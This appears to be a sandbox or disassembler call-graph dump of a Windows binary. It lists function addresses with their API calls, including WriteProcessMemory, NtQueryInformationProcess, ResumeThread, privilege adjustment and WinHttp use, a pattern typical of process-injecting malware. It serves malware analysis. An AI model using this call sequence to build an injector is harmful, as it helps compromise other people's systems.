14684 39a45e 14682->14684 14683->14684 14685 39a471 14684->14685 14686 39bb40 HeapFree 14684->14686 14685->14640 14688 391cc0 14685->14688 14686->14685 14687->14665 14687->14668 14689 391cdd 14688->14689 14692 391ce7 14688->14692 14689->14640 14690 391d15 14691 391d37 14690->14691 14693 3926f0 2 API calls 14690->14693 14702 391eee 14690->14702 14694 391d5a 14691->14694 14695 3926f0 2 API calls 14691->14695 14700 391ed4 14691->14700 14692->14689 14692->14690 14697 3926f0 2 API calls 14692->14697 14693->14691 14696 391da4 14694->14696 14699 3926f0 2 API calls 14694->14699 14701 391eba 14694->14701 14695->14694 14698 3a0780 14 API calls 14696->14698 14697->14690 14703 391e06 14698->14703 14718 391d7c 14699->14718 14700->14702 14704 391140 VirtualFreeEx 14700->14704 14701->14700 14707 391140 VirtualFreeEx 14701->14707 14702->14640 14705 391e6d 14703->14705 14708 391e47 14703->14708 14710 396cd0 ReadProcessMemory 14703->14710 14704->14702 14706 391e87 14705->14706 14709 391140 VirtualFreeEx 14705->14709 14706->14701 14711 396cd0 ReadProcessMemory 14706->14711 14707->14700 14715 391e61 14708->14715 14906 396c50 14708->14906 14709->14706 14713 391e2e 14710->14713 14714 391ea0 14711->14714 14716 391140 VirtualFreeEx 14713->14716 14717 391140 VirtualFreeEx 14714->14717 14715->14705 14914 3a08e0 14715->14914 14716->14708 14717->14701 14718->14696 14718->14706 14720 3926f0 2 API calls 14718->14720 14721 391dc0 14720->14721 14722 39bb40 HeapFree 14721->14722 14722->14696 14724 3927be 14723->14724 14725 392816 14723->14725 14728 399090 2 API calls 14724->14728 14726 39285b 14725->14726 14734 39284b 14725->14734 14739 396d30 14725->14739 14726->14724 14752 39dfb0 14726->14752 14735 3927cc 14728->14735 14733 3928a1 14733->14724 14736 3928b3 14733->14736 14734->14726 14815 3a1740 14734->14815 14735->14659 14785 39b3b0 14736->14785 14738 3928bd 14738->14659 14740 396d68 14739->14740 14741 392840 14740->14741 14742 396d71 GetTokenInformation 14740->14742 14741->14734 14743 395f90 14741->14743 14742->14741 14744 399090 2 API calls 14743->14744 14745 395fad 14744->14745 14746 3a1d90 10 API calls 14745->14746 14747 395fcb 14745->14747 14748 395feb 14746->14748 14747->14734 14748->14747 14749 39601a 14748->14749 14823 39c320 14748->14823 14750 39bb40 HeapFree 14749->14750 14750->14747 14753 39dfd1 memset 14752->14753 14754 39dfc7 14752->14754 14756 39dff6 14753->14756 14754->14733 14755 39e395 14755->14733 14756->14755 14757 397b30 WriteProcessMemory 14756->14757 14758 39e119 14757->14758 14758->14755 14759 399090 2 API calls 14758->14759 14760 39e13a 14759->14760 14761 396cb0 2 API calls 14760->14761 14762 39e163 GetProcAddress 14761->14762 14763 396cb0 2 API calls 14762->14763 14764 39e18b GetProcAddress 14763->14764 14765 396cb0 2 API calls 14764->14765 14766 39e1b3 GetProcAddress 14765->14766 14767 396cb0 2 API calls 14766->14767 14768 39e1db GetProcAddress 14767->14768 14769 396cb0 2 API calls 14768->14769 14770 39e203 GetProcAddress 14769->14770 14771 396cb0 2 API calls 14770->14771 14772 39e22b GetProcAddress 14771->14772 14773 396cb0 2 API calls 14772->14773 14774 39e253 GetProcAddress 14773->14774 14775 396cb0 2 API calls 14774->14775 14776 39e27b GetProcAddress 14775->14776 14776->14755 14777 39e29c 14776->14777 14777->14755 14778 397b30 WriteProcessMemory 14777->14778 14779 39e2ea 14778->14779 14779->14755 14856 396740 NtQueryInformationProcess 14779->14856 14782 397b30 WriteProcessMemory 14783 39e333 14782->14783 14783->14755 14784 39e37f ResumeThread 14783->14784 14784->14755 14786 39b3c9 14785->14786 14789 39b3d2 14785->14789 14786->14738 14787 39ba07 14788 39ba21 14787->14788 14790 397920 14 API calls 14787->14790 14791 39ba2e 14788->14791 14792 39bb40 HeapFree 14788->14792 14789->14787 14793 39b41e GetLastError 14789->14793 14794 39b42f 14789->14794 14790->14788 14791->14738 14792->14791 14793->14787 14793->14794 14794->14787 14795 397b30 WriteProcessMemory 14794->14795 14796 39b4b0 14795->14796 14796->14787 14864 39d9d0 VirtualProtectEx 14796->14864 14798 3a1d90 10 API calls 14799 39b53f memset 14798->14799 14801 397b30 WriteProcessMemory 14799->14801 14800 39b774 14800->14787 14811 39b91f 14800->14811 14814 396cb0 memset memcpy 14800->14814 14804 39b4cc 14801->14804 14803 39b5a6 14803->14787 14805 39b68f 14803->14805 14806 397b30 WriteProcessMemory 14803->14806 14804->14787 14804->14798 14804->14803 14807 397b30 WriteProcessMemory 14804->14807 14805->14787 14805->14800 14812 397b30 WriteProcessMemory 14805->14812 14865 3917d0 14805->14865 14882 3965f0 14805->14882 14806->14803 14807->14804 14808 39b9f5 14809 39e6f0 14 API calls 14808->14809 14809->14787 14811->14787 14811->14808 14896 39d9d0 VirtualProtectEx 14811->14896 14812->14805 14814->14800 14816 3a1768 14815->14816 14817 399090 2 API calls 14816->14817 14818 3a1787 14817->14818 14819 3a1d90 10 API calls 14818->14819 14820 3a17a0 14818->14820 14821 3a17c6 14819->14821 14820->14726 14821->14820 14822 39bb40 HeapFree 14821->14822 14822->14820 14824 39c366 14823->14824 14825 39c44f 14824->14825 14826 396cb0 2 API calls 14824->14826 14828 39c474 LookupPrivilegeValueW 14825->14828 14845 39c4bf 14825->14845 14827 39c391 14826->14827 14829 39c3b0 14827->14829 14830 39c446 14827->14830 14831 39c490 AdjustTokenPrivileges 14828->14831 14828->14845 14832 396cb0 2 API calls 14829->14832 14830->14749 14831->14845 14833 39c3c1 GetProcAddress 14832->14833 14834 396cb0 2 API calls 14833->14834 14835 39c3ea GetProcAddress 14834->14835 14836 396cb0 2 API calls 14835->14836 14838 39c40d GetProcAddress 14836->14838 14837 39c6f8 14840 39c763 14837->14840 14842 39bb40 HeapFree 14837->14842 14839 396cb0 2 API calls 14838->14839 14841 39c430 GetProcAddress 14839->14841 14843 39c76d AdjustTokenPrivileges 14840->14843 14844 39c797 14840->14844 14841->14825 14841->14830 14842->14840 14843->14844 14844->14749 14845->14837 14846 39c588 GetTokenInformation 14845->14846 14847 39c5ab GetLastError 14846->14847 14848 39c5d1 GetTokenInformation 14846->14848 14847->14837 14849 39c5ba 14847->14849 14848->14837 14852 39c5f6 14848->14852 14850 3a1d90 10 API calls 14849->14850 14851 39c5c4 14850->14851 14851->14837 14851->14848 14852->14837 14853 399090 2 API calls 14852->14853 14854 39c69d 14853->14854 14854->14837 14855 39c6c6 CreateProcessAsUserW 14854->14855 14855->14837 14857 39676e 14856->14857 14863 3967b5 14856->14863 14858 396cd0 ReadProcessMemory 14857->14858 14859 396780 14858->14859 14860 396cd0 ReadProcessMemory 14859->14860 14859->14863 14861 396796 14860->14861 14862 396cd0 ReadProcessMemory 14861->14862 14861->14863 14862->14863 14863->14755 14863->14782 14863->14783 14864->14804 14866 399090 2 API calls 14865->14866 14867 3917f4 14866->14867 14868 396cb0 2 API calls 14867->14868 14869 391802 GetProcAddress 14868->14869 14871 391828 14869->14871 14872 39188b 14869->14872 14873 391170 11 API calls 14871->14873 14874 39189b 14872->14874 14875 39bb40 HeapFree 14872->14875 14876 391838 14873->14876 14874->14805 14875->14874 14876->14872 14877 3926f0 2 API calls 14876->14877 14878 391861 14877->14878 14878->14872 14879 3a0780 14 API calls 14878->14879 14880 391875 14879->14880 14881 391140 VirtualFreeEx 14880->14881 14881->14872 14883 399090 2 API calls 14882->14883 14884 396612 14883->14884 14885 396cb0 2 API calls 14884->14885 14886 396620 GetProcAddress 14885->14886 14888 3966b0 14886->14888 14889 396646 14886->14889 14888->14805 14892 3926f0 2 API calls 14889->14892 14894 39666e 14889->14894 14890 3966a4 14890->14805 14891 3a0780 14 API calls 14893 396686 14891->14893 14892->14894 14893->14890 14895 391140 VirtualFreeEx 14893->14895 14894->14890 14894->14891 14895->14890 14896->14811 14898 3966c0 11 API calls 14897->14898 14899 3926a9 14898->14899 14900 39bb60 14899->14900 14901 3966c0 11 API calls 14900->14901 14902 39a2cb 14901->14902 14902->14674 14904 3966c0 11 API calls 14903->14904 14905 39a390 14904->14905 14905->14672 14905->14687 14907 396c65 14906->14907 14908 396c5e 14906->14908 14910 396c9f 14907->14910 14911 396c91 14907->14911 14958 392e90 14907->14958 14927 394bf0 14908->14927 14910->14708 14985 3b2080 14911->14985 14922 3a0904 14914->14922 14915 3a09c5 14916 3a09d2 14915->14916 14918 39bb40 HeapFree 14915->14918 14919 3a09e5 14916->14919 14921 39bb40 HeapFree 14916->14921 14917 3a0923 lstrlenW 15321 39ba40 14917->15321 14918->14916 14919->14705 14921->14919 14922->14915 14922->14917 14923 39bb40 HeapFree 14922->14923 14924 397e20 11 API calls 14922->14924 14925 3a0500 14 API calls 14922->14925 14926 397af0 14 API calls 14922->14926 14923->14922 14924->14922 14925->14922 14926->14922 14928 39e520 CoCreateInstance 14927->14928 14929 394c1a 14928->14929 14930 399090 2 API calls 14929->14930 14931 394c28 14930->14931 14932 399090 2 API calls 14931->14932 14952 394eea 14931->14952 14933 394c5f 14932->14933 14935 3a0c10 _vsnwprintf 14933->14935 14934 39bb40 HeapFree 14936 394f09 14934->14936 14956 394c82 14935->14956 14937 394f1d 14936->14937 14939 39bb40 HeapFree 14936->14939 14938 394f30 14937->14938 14940 39bb40 HeapFree 14937->14940 14938->14907 14939->14937 14940->14938 14941 39bb40 HeapFree 14941->14956 14942 399090 2 API calls 14942->14956 14943 3a0c10 _vsnwprintf 14943->14956 14945 394d1e _time64 14945->14956 14946 394d59 _time64 14946->14956 14948 394deb Sleep 14949 394dfc 14948->14949 14948->14956 14949->14956 14951 394e3a GetFileAttributesW 14951->14956 14952->14934 14952->14936 14953 391a80 2 API calls 14954 394ea6 _time64 14953->14954 14954->14956 14955 394e69 CreateDirectoryW 14955->14956 14956->14936 14956->14941 14956->14942 14956->14943 14956->14946 14956->14948 14956->14951 14956->14952 14956->14953 14956->14955 14957 392e90 23 API calls 14956->14957 15005 39ed90 CreateFileW 14956->15005 15007 395a10 14956->15007 15021 399f70 14956->15021 14957->14956 14959 39e520 CoCreateInstance 14958->14959 14960 392eb6 14959->14960 14961 397e20 11 API calls 14960->14961 14962 392ec6 14961->14962 14963 399090 2 API calls 14962->14963 14984 393007 14962->14984 14964 392edf 14963->14964 14969 399090 2 API calls 14964->14969 14964->14984 14965 39bb40 HeapFree 14967 393017 14965->14967 14966 393027 14966->14907 14967->14966 14968 39bb40 HeapFree 14967->14968 14968->14966 14970 392f17 14969->14970 14971 3a0c10 _vsnwprintf 14970->14971 14972 392f3a 14971->14972 14973 399090 2 API calls 14972->14973 14972->14984 14974 392f53 14973->14974 14984->14965 14984->14967 14986 39e520 CoCreateInstance 14985->14986 14987 3b20ac 14986->14987 14988 397e20 11 API calls 14987->14988 15000 3b20bc 14988->15000 14989 3b21aa 14990 3b21c0 14989->14990 14992 39bb40 HeapFree 14989->14992 14991 3b21d4 14990->14991 14993 39bb40 HeapFree 14990->14993 14994 3b21e6 14991->14994 14995 39bb40 HeapFree 14991->14995 14992->14990 14993->14991 14994->14907 14995->14994 14996 395a10 58 API calls 14996->15000 14997 3b2102 Sleep 14997->15000 14998 399f70 13 API calls 14998->15000 14999 3b2157 14999->14989 14999->14990 15001 3a0500 14 API calls 14999->15001 15000->14989 15000->14996 15000->14997 15000->14998 15000->14999 15002 39bb40 HeapFree 15000->15002 15003 3b219b 15001->15003 15002->15000 15003->14989 15004 397af0 14 API calls 15003->15004 15004->14989 15006 39edbf 15005->15006 15006->14945 15009 395a30 15007->15009 15008 395b5c 15008->14956 15009->15008 15016 3990f0 32 API calls 15009->15016 15019 395b2d Sleep 15009->15019 15020 395aba Sleep 15009->15020 15024 395280 15009->15024 15045 391200 15009->15045 15060 396e80 15009->15060 15076 3a0dc0 15009->15076 15097 39e5e0 15009->15097 15116 39bbb0 15009->15116 15156 3a13a0 15009->15156 15173 396f60 15009->15173 15016->15009 15019->15009 15020->15009 15022 3968a0 13 API calls 15021->15022 15023 399f98 15022->15023 15023->14956 15025 395390 15024->15025 15026 3952a4 15024->15026 15025->15009 15026->15025 15046 3912c0 15045->15046 15047 391227 15045->15047 15046->15009 15047->15046 15061 396f4a 15060->15061 15062 396ea7 15060->15062 15061->15009 15062->15061 15077 3a0eb9 15076->15077 15078 3a0de5 15076->15078 15077->15009 15078->15077 15098 39e604 15097->15098 15099 39e6e6 15097->15099 15098->15099 15099->15009 15117 39bbf1 15116->15117 15118 39bbe0 15116->15118 15117->15009 15118->15117 15157 3a1498 15156->15157 15158 3a13c4 15156->15158 15157->15009 15158->15157 15174 39705e 15173->15174 15175 396f84 15173->15175 15174->15009 15175->15174 15323 39ba78 15321->15323 15322 39ba7c 15322->14922 15323->15322 15324 3a1d90 10 API calls 15323->15324 15326 39ba90 15324->15326 15325 39babd 15325->14922 15326->15325 15327 39bb40 HeapFree 15326->15327 15327->15325 16767 3a0c80 16768 3a0ca1 16767->16768 16771 3a0ca7 16767->16771 16769 39bb40 HeapFree 16768->16769 16769->16771 16770 3a1d90 10 API calls 16772 3a0cb7 16770->16772 16771->16770 16773 3a0d77 16772->16773 16774 3a0cc4 GetAdaptersInfo 16772->16774 16779 3a0d99 16773->16779 16782 39bb40 HeapFree 16773->16782 16775 3a0cdc 16774->16775 16776 3a0ce6 16774->16776 16778 3a1d90 10 API calls 16775->16778 16776->16773 16777 39f720 11 API calls 16776->16777 16780 3a0d26 16777->16780 16778->16776 16781 3a0da6 16779->16781 16784 39bb40 HeapFree 16779->16784 16783 3a0d2a 16780->16783 16785 3a1d90 10 API calls 16780->16785 16782->16779 16784->16781 16787 3a0d44 16785->16787 16786 3a0c10 _vsnwprintf 16786->16787 16787->16773 16787->16783 16787->16786 18019 39b4fc 18020 39b500 18019->18020 18021 3a1d90 10 API calls 18020->18021 18022 39ba07 18020->18022 18029 397b30 WriteProcessMemory 18020->18029 18030 39b5a6 18020->18030 18023 39b53f memset 18021->18023 18024 39ba21 18022->18024 18026 397920 14 API calls 18022->18026 18025 397b30 WriteProcessMemory 18023->18025 18027 39ba2e 18024->18027 18028 39bb40 HeapFree 18024->18028 18025->18020 18026->18024 18028->18027 18029->18020 18030->18022 18032 397b30 WriteProcessMemory 18030->18032 18036 39b68f 18030->18036 18031 3917d0 15 API calls 18031->18036 18032->18030 18033 39b9f5 18034 39e6f0 14 API calls 18033->18034 18034->18022 18035 3965f0 15 API calls 18035->18036 18036->18022 18036->18031 18036->18035 18038 397b30 WriteProcessMemory 18036->18038 18040 39b774 18036->18040 18037 39b91f 18037->18022 18037->18033 18042 39d9d0 VirtualProtectEx 18037->18042 18038->18036 18040->18022 18040->18037 18041 396cb0 memset memcpy 18040->18041 18041->18040 18042->18037 13502 39fd69 13530 392420 13502->13530 13505 39fda9 13532 391b20 13505->13532 13507 39fdb4 13508 39fdbc ??2@YAPAXI 13507->13508 13509 39fdd0 13508->13509 13550 3970b0 13509->13550 13531 392429 ??3@YAXPAX 13530->13531 13531->13505 13533 391b30 13532->13533 13534 391b3b memset memset 13533->13534 13678 394a10 13534->13678 13536 391b6c 13705 39f0a0 13536->13705 13539 391b8c ??2@YAPAXI 13543 391bad 13539->13543 13544 391ba4 13539->13544 13540 391b85 13708 392df0 13540->13708 13714 3a14a0 13543->13714 13761 39cbf0 13544->13761 13547 391bca 13749 39ce00 _time64 13547->13749 13549 391bd1 13549->13507 13679 394a38 13678->13679 13680 399090 2 API calls 13679->13680 13681 394a46 13680->13681 13764 396cb0 13681->13764 13685 394a7e 13686 394a86 GetNativeSystemInfo 13685->13686 13689 394a97 13686->13689 13687 399090 2 API calls 13688 394b3e 13687->13688 13690 399090 2 API calls 13688->13690 13689->13687 13691 394b58 13690->13691 13692 3a1d90 10 API calls 13691->13692 13693 394b64 13692->13693 13694 394b6d 13693->13694 13695 394b79 13693->13695 13696 394bb6 13693->13696 13694->13536 13697 399090 2 API calls 13695->13697 13698 399090 2 API calls 13696->13698 13699 394b87 13697->13699 13700 394bc4 13698->13700 13767 3a0c10 13699->13767 13701 3a0c10 _vsnwprintf 13700->13701 13703 394be4 13701->13703 13703->13536 13780 391c70 13705->13780 13707 391b74 ??2@YAPAXI 13707->13539 13707->13540 13709 399090 2 API calls 13708->13709 13710 392e25 GetFileAttributesW 13709->13710 13711 392e42 13710->13711 13712 392e83 13711->13712 13713 392e6f CreateDirectoryW 13711->13713 13712->13539 13713->13712 13715 3a14c6 13714->13715 13716 3a14c0 13714->13716 13718 399090 2 API calls 13715->13718 13717 39bb40 HeapFree 13716->13717 13717->13715 13719 3a14dd 13718->13719 13785 393c70 CreateFileW 13719->13785 13722 399090 2 API calls 13723 3a150a 13722->13723 13724 393c70 15 API calls 13723->13724 13725 3a151e 13724->13725 13726 399090 2 API calls 13725->13726 13748 3a171d 13725->13748 13727 3a153a 13726->13727 13728 393c70 15 API calls 13727->13728 13729 3a154e 13728->13729 13730 3a1d90 10 API calls 13729->13730 13729->13748 13734 3a1588 13730->13734 13748->13547 13750 39ce28 13749->13750 13760 39ce8a 13749->13760 13750->13760 13797 3b1e30 13750->13797 13760->13549 13762 3a1d90 10 API calls 13761->13762 13763 39cc17 13762->13763 13763->13543 13771 3a12a0 13764->13771 13768 3a0c1c 13767->13768 13769 3a0c2d _vsnwprintf 13768->13769 13770 394bac 13768->13770 13769->13770 13770->13536 13774 3950b0 13771->13774 13775 394a57 GetProcAddress 13774->13775 13777 3950d0 13774->13777 13775->13685 13775->13686 13776 395186 memset 13779 39519c 13776->13779 13777->13775 13777->13776 13777->13779 13778 395202 memcpy 13778->13775 13779->13775 13779->13778 13781 3a12a0 2 API calls 13780->13781 13782 391c8a 13781->13782 13783 3a1d90 10 API calls 13782->13783 13784 391c96 13783->13784 13784->13707 13786 393cab SetFilePointer SetFilePointer 13785->13786 13793 393cd9 13785->13793 13787 393ce0 13786->13787 13786->13793 13788 3a1d90 10 API calls 13787->13788 13789 393ce8 13788->13789 13790 393cf1 ReadFile 13789->13790 13789->13793 13791 393d0e 13790->13791 13790->13793 13792 39bb40 HeapFree 13791->13792 13792->13793 13793->13722 13793->13748 13815 3b1d30 13797->13815 13799 3b1fb1 13809 399090 memset memcpy 13812 3b1e52 13809->13812 13812->13799 13812->13809 13813 39bb40 HeapFree 13812->13813 13818 3b1320 13812->13818 13826 3b13d0 13812->13826 13841 3b1660 13812->13841 13813->13812 13816 399090 2 API calls 13815->13816 13817 3b1d65 WinHttpOpen 13816->13817 13817->13812 15328 39fee0 15344 39fef9 15328->15344 15329 39ff15 _time64 15329->15344 15332 3a0390 15553 3b0a40 15332->15553 15336 39c870 59 API calls 15336->15344 15338 3a03a0 15340 391700 HeapFree 15338->15340 15339 399090 memset memcpy 15339->15344 15341 3a03d4 15340->15341 15342 39f850 24 API calls 15341->15342 15346 3a03df 15342->15346 15343 395a10 58 API calls 15343->15344 15344->15328 15344->15329 15344->15332 15344->15336 15344->15338 15344->15339 15344->15343 15345 3a0102 _time64 15344->15345 15351 39f2d0 11 API calls 15344->15351 15362 39bb40 HeapFree 15344->15362 15364 39d890 15344->15364 15384 3a1b80 15344->15384 15404 39ac90 15344->15404 15420 3942a0 15344->15420 15426 3a12c0 WSAStartup 15344->15426 15432 3936e0 15344->15432 15472 391fe0 15344->15472 15496 3999a0 WSAStartup 15344->15496 15516 399890 15344->15516 15531 397560 15344->15531 15547 3a0ad0 15344->15547 15345->15344 15348 3a04e6 15346->15348 15350 398030 10 API calls 15346->15350 15352 3a04f5 ExitProcess 15348->15352 15353 3a042e 15350->15353 15351->15344 15355 3a1d90 10 API calls 15353->15355 15359 3a0439 15355->15359 15361 39bb40 HeapFree 15359->15361 15361->15348 15363 3a027e _time64 15362->15363 15363->15344 15365 399090 2 API calls 15364->15365 15366 39d8b4 15365->15366 15367 395a10 58 API calls 15366->15367 15368 39d8ce 15367->15368 15371 39d8e7 ??2@YAPAXI 15368->15371 15379 39d931 15368->15379 15369 39d93f 15369->15344 15370 39bb40 HeapFree 15370->15369 15372 39d8fd 15371->15372 15373 39d8f6 15371->15373 15375 399020 15 API calls 15372->15375 15579 39b1c0 15373->15579 15376 39d916 15375->15376 15377 39d94a _time64 15376->15377 15380 39d91a 15376->15380 15378 39d95d 15377->15378 15381 39d96a 15377->15381 15378->15380 15378->15381 15379->15369 15379->15370 15380->15379 15383 39d928 ??3@YAXPAX 15380->15383 15381->15379 15382 39d97a ??3@YAXPAX 15381->15382 15382->15379 15383->15379 15385 395a10 58 API calls 15384->15385 15386 3a1ba5 15385->15386 15387 3a1bac ??2@YAPAXI 15386->15387 15388 3a1bf6 15386->15388 15390 3a1bbb 15387->15390 15391 3a1bc2 15387->15391 15389 3a1c04 15388->15389 15392 39bb40 HeapFree 15388->15392 15389->15344 15582 3a1cf0 15390->15582 15394 399020 15 API calls 15391->15394 15392->15389 15395 3a1bdb 15394->15395 15396 3a1c0f _time64 15395->15396 15397 3a1bdf 15395->15397 15398 3a1c1e 15396->15398 15399 3a1c2c 15396->15399 15397->15388 15585 391380 15397->15585 15398->15397 15398->15399 15399->15388 15400 391380 HeapFree 15399->15400 15402 3a1c3c ??3@YAXPAX 15400->15402 15402->15388 15416 39acb4 15404->15416 15405 39ae54 15406 39ae68 15405->15406 15409 39bb40 HeapFree 15405->15409 15410 39ae82 15406->15410 15412 399fc0 2 API calls 15406->15412 15409->15406 15410->15344 15413 39ae79 ??3@YAXPAX 15412->15413 15413->15410 15414 3a1d90 10 API calls 15414->15416 15415 399090 memset memcpy 15415->15416 15416->15405 15416->15414 15416->15415 15417 397560 346 API calls 15416->15417 15418 3a0c10 _vsnwprintf 15416->15418 15419 396110 17 API calls 15416->15419 15596 392640 15416->15596 15603 399fc0 15416->15603 15417->15416 15418->15416 15419->15416 15421 3942cc 15420->15421 15422 399090 2 API calls 15421->15422 15423 3942da 15422->15423 15424 395a10 58 API calls 15423->15424 15425 3942f3 15424->15425 15425->15344 15427 3a12f6 gethostname 15426->15427 15431 3a12ec 15426->15431 15428 3a1313 getaddrinfo 15427->15428 15427->15431 15428->15431 15429 3a137f freeaddrinfo 15430 3a1386 WSACleanup 15429->15430 15430->15344 15431->15429 15431->15430 15433 3936fc 15432->15433 15434 393703 15432->15434 15433->15344 15435 398030 10 API calls 15434->15435 15436 39370d 15435->15436 15437 39396f 15436->15437 15438 39371f 15436->15438 15442 399090 2 API calls 15437->15442 15446 3939b6 15437->15446 15460 393905 15437->15460 15439 39e520 CoCreateInstance 15438->15439 15441 393727 15439->15441 15440 393c65 15440->15344 15445 399090 2 API calls 15441->15445 15444 393995 GetFileAttributesW 15442->15444 15443 39bb40 HeapFree 15443->15440 15444->15446 15444->15460 15447 39374f 15445->15447 15448 399090 2 API calls 15446->15448 15446->15460 15609 3912d0 15447->15609 15452 393a18 15448->15452 15450 395a10 58 API calls 15455 393acf 15450->15455 15451 393bc8 15453 393bdc 15451->15453 15454 3a1d90 10 API calls 15451->15454 15452->15450 15456 399090 2 API calls 15453->15456 15453->15460 15454->15453 15455->15451 15458 393b6b 15455->15458 15455->15460 15463 399090 2 API calls 15455->15463 15456->15460 15457 399090 2 API calls 15462 393940 15457->15462 15458->15460 15461 393b9b 15458->15461 15465 39bb40 HeapFree 15458->15465 15460->15440 15460->15443 15466 3a1d90 10 API calls 15461->15466 15467 391a80 2 API calls 15462->15467 15468 393b57 15463->15468 15464 399090 2 API calls 15471 393858 15464->15471 15465->15461 15469 393bb2 memcpy 15466->15469 15467->15460 15470 393c70 15 API calls 15468->15470 15469->15451 15470->15458 15471->15457 15471->15460 15473 395a10 58 API calls 15472->15473 15474 392017 15473->15474 15475 392022 ??2@YAPAXI 15474->15475 15495 3920eb 15474->15495 15477 392037 15475->15477 15478 392030 15475->15478 15476 392111 15476->15344 15481 399020 15 API calls 15477->15481 15480 3970b0 CoCreateInstance 15478->15480 15479 39bb40 HeapFree 15479->15476 15480->15477 15482 39204c 15481->15482 15483 3920ed 15482->15483 15484 392069 15482->15484 15485 39cb70 2 API calls 15483->15485 15483->15495 15486 3b0900 13 API calls 15484->15486 15487 3920f8 ??3@YAXPAX 15485->15487 15488 392076 15486->15488 15487->15495 15489 392150 17 API calls 15488->15489 15490 39207c 15489->15490 15491 39cb70 2 API calls 15490->15491 15492 3920a0 ??3@YAXPAX 15491->15492 15493 3920bd 15492->15493 15494 3920d0 _time64 15493->15494 15493->15495 15494->15494 15494->15495 15495->15476 15495->15479 15497 3999d8 15496->15497 15499 399b04 15496->15499 15498 3a1d90 10 API calls 15497->15498 15500 3999e3 15498->15500 15501 399b0d freeaddrinfo 15499->15501 15502 399b14 15499->15502 15500->15499 15614 398730 15500->15614 15501->15502 15503 399b1e 15502->15503 15505 39bb40 HeapFree 15502->15505 15506 399b34 WSACleanup 15503->15506 15507 39bb40 HeapFree 15503->15507 15505->15503 15506->15344 15508 399b31 15507->15508 15508->15506 15509 39bb40 HeapFree 15515 3999fb 15509->15515 15510 399a2a freeaddrinfo 15510->15515 15511 399090 memset memcpy 15511->15515 15512 3a0c10 _vsnwprintf 15512->15515 15513 397e20 11 API calls 15513->15515 15514 399a91 getaddrinfo 15514->15515 15515->15499 15515->15509 15515->15510 15515->15511 15515->15512 15515->15513 15515->15514 15519 3998b7 15516->15519 15517 3998da 15520 399090 2 API calls 15517->15520 15518 394bf0 78 API calls 15518->15519 15519->15517 15519->15518 15521 39997d 15519->15521 15522 3998fb 15520->15522 15521->15344 15523 392450 15 API calls 15522->15523 15524 39990b 15523->15524 15525 399942 15524->15525 15629 3a0b00 15524->15629 15526 399967 15525->15526 15528 39bb40 HeapFree 15525->15528 15529 399971 15525->15529 15527 39bb40 HeapFree 15526->15527 15527->15529 15528->15525 15529->15344 15716 39af00 15531->15716 15533 397571 15750 3a1020 _wtoi 15533->15750 15535 3975a4 15546 3975ca 15535->15546 15751 3a1020 _wtoi 15535->15751 15537 397578 15537->15535 15539 39759c 15537->15539 15752 395650 15537->15752 15541 395a10 58 API calls 15539->15541 15540 3975b2 15542 3975c2 15540->15542 15543 3975e4 15540->15543 15540->15546 15541->15535 15545 395a10 58 API calls 15542->15545 15760 39be30 15543->15760 15545->15546 15546->15344 15548 3a0add 15547->15548 15551 3a0ae3 15547->15551 15549 39bb40 HeapFree 15548->15549 15549->15551 15550 3966c0 11 API calls 15552 3a0aef 15550->15552 15551->15550 15552->15344 15554 399090 2 API calls 15553->15554 15555 3b0a63 15554->15555 15556 393c70 15 API calls 15555->15556 15557 3b0a77 15556->15557 15558 3b0aa0 15557->15558 15559 399090 2 API calls 15557->15559 15560 3b0ba2 15558->15560 15562 3b0abe ??2@YAPAXI 15558->15562 15568 3b0b7c 15558->15568 15561 3b0a8c 15559->15561 15560->15338 15563 393c70 15 API calls 15561->15563 15564 3b0ad0 15562->15564 15562->15568 15563->15558 15566 3970b0 CoCreateInstance 15564->15566 15565 39bb40 HeapFree 15565->15560 15567 3b0ad8 15566->15567 15567->15568 15569 3b09a0 19 API calls 15567->15569 15568->15560 15568->15565 15570 3b0afc 15569->15570 15571 3b0b83 15570->15571 15573 3b0b14 15570->15573 15572 39cb70 2 API calls 15571->15572 15574 3b0b8a ??3@YAXPAX 15572->15574 15575 3b0b3d 15573->15575 15576 39cb70 2 API calls 15573->15576 15574->15568 15575->15568 15578 3b0b61 _time64 15575->15578 15577 3b0b34 ??3@YAXPAX 15576->15577 15577->15575 15578->15568 15578->15578 15580 39e520 CoCreateInstance 15579->15580 15581 39b1c8 15580->15581 15581->15372 15583 39e520 CoCreateInstance 15582->15583 15584 3a1cf8 15583->15584 15584->15391 15588 39d6a0 15585->15588 15589 39d6c5 15588->15589 15590 39d6ab 15588->15590 15591 39bb40 HeapFree 15589->15591 15590->15589 15592 39bb40 HeapFree 15590->15592 15593 39d6ce 15591->15593 15592->15590 15594 39bb40 HeapFree 15593->15594 15595 39138e 15594->15595 15597 39264d 15596->15597 15598 392688 15596->15598 15597->15598 15599 392655 ??2@YAPAXI 15597->15599 15598->15416 15599->15598 15600 392669 15599->15600 15608 392120 SysAllocString SysAllocString 15600->15608 15602 39267b 15602->15416 15604 399fd0 SysFreeString 15603->15604 15605 399fd3 15603->15605 15604->15605 15606 399fda SysFreeString 15605->15606 15607 399fdd ??3@YAXPAX 15605->15607 15606->15607 15607->15416 15608->15602 15610 391050 17 API calls 15609->15610 15613 3912fc 15610->15613 15611 39136c 15611->15460 15611->15464 15611->15471 15612 39bb40 HeapFree 15612->15611 15613->15611 15613->15612 15615 397b80 10 API calls 15614->15615 15616 398757 15615->15616 15617 3a1d90 10 API calls 15616->15617 15628 3987a4 15616->15628 15619 39876c 15617->15619 15618 3987cd 15622 39bb40 HeapFree 15618->15622 15623 399090 2 API calls 15619->15623 15619->15628 15620 3987e7 15620->15515 15621 39bb40 HeapFree 15621->15628 15625 3987d6 15622->15625 15626 398783 15623->15626 15624 39bb40 HeapFree 15624->15620 15625->15620 15625->15624 15627 3a0c10 _vsnwprintf 15626->15627 15627->15628 15628->15618 15628->15621 15628->15625 15649 39c7b0 15629->15649 15631 3a0b1c 15632 3a0bcd 15631->15632 15633 39ed90 CreateFileW 15631->15633 15632->15524 15634 3a0b33 15633->15634 15635 3a0b3e _time64 15634->15635 15636 3a0baf 15634->15636 15635->15636 15637 3a0b53 15635->15637 15638 39bb40 HeapFree 15636->15638 15637->15636 15664 391be0 15637->15664 15638->15632 15640 3a0b64 15640->15636 15641 397a20 19 API calls 15640->15641 15642 3a0b71 ??3@YAXPAX 15641->15642 15678 39ee40 15642->15678 15645 3a0b8c _time64 15645->15636 15646 3a0bb4 15647 397a20 19 API calls 15646->15647 15648 3a0bbb ??3@YAXPAX 15647->15648 15648->15636 15650 399090 2 API calls 15649->15650 15651 39c7cd 15650->15651 15652 399090 2 API calls 15651->15652 15653 39c7db 15652->15653 15654 3a0c10 